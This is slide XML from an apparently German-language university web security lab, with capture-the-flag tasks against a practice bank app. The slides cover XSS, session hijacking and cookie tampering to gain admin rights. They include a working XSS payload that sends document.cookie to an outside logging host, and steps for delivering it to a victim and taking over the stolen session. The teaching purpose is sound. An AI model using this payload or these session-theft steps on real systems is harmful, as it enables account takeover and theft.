            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>Überprüfe ob Du die Daten des GET-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0" err="1"/>
              <a:t>Requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t> in Deinem Dump findest.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2818310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CFEB1-A496-5786-E2DF-F71EB678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Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT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58F23B-A48C-1518-3534-FDF181F42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407D-193E-4BAB-AE77-9606647CE952}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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C7B759-00AA-B465-671E-50DBB560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0E39EB-18C2-86B8-850F-B3FFEFD3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12</a:t>
            </a:fld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E84538D-A0C4-FE0C-08AF-777EA5967A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720" y="1362714"/>
            <a:ext cx="6461548" cy="3024188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0"/>
              <a:t>Nun müssen wir unser Opfer dazu bringen, die Session an unsere Toilette zu senden. Da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0" err="1"/>
              <a:t>jQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0"/>
              <a:t> von der </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0" err="1"/>
              <a:t>MintBank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0"/>
              <a:t> verwendet wird, können wir direkt auf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0" err="1"/>
              <a:t>jQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0"/>
              <a:t> zugreifen. Gib in der </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0" err="1"/>
              <a:t>Console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0"/>
              <a:t> folgenden Befehl zum Testen ein:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-AT" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-AT" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0"/>
              <a:t>Mehr Infos zu $.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0" err="1"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0"/>
              <a:t>(…) findest du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>hier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0"/>
              <a:t>Überprüfe den </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0" err="1"/>
              <a:t>StatusCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0"/>
              <a:t> der Response. Was die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0" err="1"/>
              <a:t>StatusCodes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0"/>
              <a:t> bedeuten, kannst Du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>hier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0"/>
              <a:t> nachlesen.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D038522-241C-9B19-CA65-A19E56E9C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02" y="2612834"/>
            <a:ext cx="5839640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59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7CAFA-6D37-78BA-AD7A-1E60A977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Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT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8ED63B2-6CC2-9D8F-0DF5-B3322C1F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407D-193E-4BAB-AE77-9606647CE952}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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7A7750-A5B6-56A1-E12C-88CBA874E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EBF168-5E73-2CAD-474F-468F8EB8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13</a:t>
            </a:fld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B6DEF78-A212-2290-990F-1CE289524F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600" y="1527175"/>
            <a:ext cx="2401455" cy="3024188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>Du solltest nun Deine eigene Session in Deinem Toiletten-Dump finden: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1B11B02-55B8-2D77-2C5D-A7146E5D6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418" y="1064608"/>
            <a:ext cx="5509715" cy="375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44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CFEB1-A496-5786-E2DF-F71EB678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Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT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58F23B-A48C-1518-3534-FDF181F42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407D-193E-4BAB-AE77-9606647CE952}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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C7B759-00AA-B465-671E-50DBB560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0E39EB-18C2-86B8-850F-B3FFEFD3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14</a:t>
            </a:fld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E84538D-A0C4-FE0C-08AF-777EA5967A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720" y="1362714"/>
            <a:ext cx="6461548" cy="3024188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0"/>
              <a:t>Nun kombinieren wir alles:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-AT" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>Erstelle ein JS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0" err="1"/>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>, welches einen GET-Request an Deine Toilette sendet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-AT" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;$.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('https://ptsv2.com/t/ll80z-1234567890/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>post?leckerkekse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>Verwende eine der beiden Möglichkeiten um dieses JS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0" err="1"/>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t> an Dein Opfer zu senden!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>Schau in Deinen Toiletten-Dump und kopiere die Session Deines Opfers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98746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CFEB1-A496-5786-E2DF-F71EB678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Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT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58F23B-A48C-1518-3534-FDF181F42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407D-193E-4BAB-AE77-9606647CE952}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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C7B759-00AA-B465-671E-50DBB560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0E39EB-18C2-86B8-850F-B3FFEFD3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15</a:t>
            </a:fld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E84538D-A0C4-FE0C-08AF-777EA5967A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720" y="1362714"/>
            <a:ext cx="6461548" cy="3024188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0"/>
              <a:t>Nun müssen wir die Session unseres Opfers übernehmen:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-AT" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>Öffne das </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0" err="1"/>
              <a:t>Debug-Window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t> Deines Browsers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>Öffne den Reiter „</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0" err="1"/>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>“.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>Unter Storage -&gt; Cookies findest Du die Cookies, welche von der </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0" err="1"/>
              <a:t>MintBank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t> erstellt wurden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>Ändere die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0" err="1"/>
              <a:t>SessionId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t> auf die Deines Opfers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>Aktualisiere die Webseite.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>Raub den Account Deines Opfers aus.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1137636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6DBDD3-A985-7B7C-9DBF-4C7F8DAB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Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT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86AE32-A3FC-94AD-A318-222A79C7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407D-193E-4BAB-AE77-9606647CE952}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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D311C8-A68D-5F65-BB16-10B630B1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75297E-01DB-9071-83D1-5EEBDFFB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16</a:t>
            </a:fld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31C1CF4-7CAA-7A05-0854-78699C3950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dirty="0"/>
              <a:t>Du willst nicht die Toilette von jemand anderen verwenden? Dann erstell Dir Deine eigene Toilette!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>Z.B. mit PHP und Deinem Webspace der FHS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Lesen von GET-Parametern</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Schreiben in eine Datei</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Lade die PHP-Datei auf einen Webserver (z.B. auf Deinen Webspace der FHS)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>Passe Dein XSS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> entsprechend an und führe den XSS-Angriff erneut aus!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="544829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CFEB1-A496-5786-E2DF-F71EB678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Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Deserialization</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT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58F23B-A48C-1518-3534-FDF181F42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407D-193E-4BAB-AE77-9606647CE952}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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C7B759-00AA-B465-671E-50DBB560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0E39EB-18C2-86B8-850F-B3FFEFD3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17</a:t>
            </a:fld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E84538D-A0C4-FE0C-08AF-777EA5967A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720" y="1362714"/>
            <a:ext cx="6461548" cy="3024188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0"/>
              <a:t>Ändere Deine eigene Session:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-AT" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>Öffne das </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0" err="1"/>
              <a:t>Debug-Window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t> Deines Browsers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>Öffne den Reiter „</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0" err="1"/>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>“.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>Unter Storage -&gt; Cookies findest Du die Cookies, welche von der </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0" err="1"/>
              <a:t>MintBank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t> erstellt wurden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>Ändere den letzten Wert Deiner Session auf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>100.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>Aktualisiere die Webseite.</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>Gehe auf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/Admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>und treibe Unfug.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1340718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411331-3CCA-4BB9-1835-FC56429F7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Aufgaben (Invalid Redirect)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT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FE1E82-1934-EB64-397D-917751B8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407D-193E-4BAB-AE77-9606647CE952}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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D93B14-6178-55F9-81CF-0D19A0F6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08D129-FA45-3BCE-F578-772413314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18</a:t>
            </a:fld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9AD82EE-95D5-8A84-F128-FBB0671B2B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dirty="0"/>
              <a:t>Schau Dir den Logout Link genauer an.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>Gehe auf:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://5.196.132.7/auth/Logout?returnUrl=https://fh-salzburg.ac.at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="144000" lvl="1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483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AD84A-C9AF-4864-8504-4E987B01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Cross-Site Scripting (XSS)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84B5E9-1F5D-46CA-ADE1-1F631EE09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979" y="1527175"/>
            <a:ext cx="7172965" cy="3024188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Eine Art von </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, bei welcher schädliche Scripts auf einer vertrauenswürde Seite eingebunden werden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Z.B. über einen Link, der Daten ungeprüft einbettet:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>site.php?data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>=&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>&gt;console.log(123);&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Erlaubt es </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>die Webseite zu manipulieren</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Cookies, Session Tokens und weitere sensible Daten </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>zu stehlen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6A39A5-02C4-4498-ACCA-7FA3B06C7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DF274-0B4E-4804-887C-0260E2BCE210}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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1216AC-7044-4007-A6D5-AB8F9729E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122841-3CB0-45EF-A75F-2428CF8E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4559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98F096-5DED-4D45-979C-CF0D04BB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Cross-Site Scripting (XSS)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4F226C-829E-479B-8D52-B2DD7E83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DF274-0B4E-4804-887C-0260E2BCE210}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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0F5BBC-6D67-42DE-B4D6-332DCA47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BA94B7-0163-4869-A959-0AFACD7D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3</a:t>
            </a:fld>
            <a:endParaRPr lang="de-AT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4131624-4E4E-45EE-8DB7-6398DD3CC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2672" y="1274548"/>
            <a:ext cx="7938655" cy="330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17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87512-4B86-4BA1-B639-8EDA8EF0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Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT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958485-53E3-4441-996B-C3D3F14D7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407D-193E-4BAB-AE77-9606647CE952}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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D220DC-461F-4433-85C0-6D38DE26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4DF68F-D00F-4619-AEA2-F2493E95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4</a:t>
            </a:fld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B75EA5F-ADCB-4229-AEF9-9048335809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Aufgaben: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Finde Möglichkeiten Deinen eigenen JavaScript-Code auszuführen (Name des Flags: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>xss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Sende einen Link an einen Deiner Kollegen, um dessen Session zu stehlen (kein </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty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661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87512-4B86-4BA1-B639-8EDA8EF0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Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Deserialization</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT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958485-53E3-4441-996B-C3D3F14D7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407D-193E-4BAB-AE77-9606647CE952}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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D220DC-461F-4433-85C0-6D38DE26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4DF68F-D00F-4619-AEA2-F2493E95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5</a:t>
            </a:fld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B75EA5F-ADCB-4229-AEF9-9048335809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Aufgabe: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Erhalte Adminrechte, indem Du Deine eigene Session manipulierst</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Name des Flags: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>change_role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844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87512-4B86-4BA1-B639-8EDA8EF0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Aufgaben</a:t>
            </a:r>
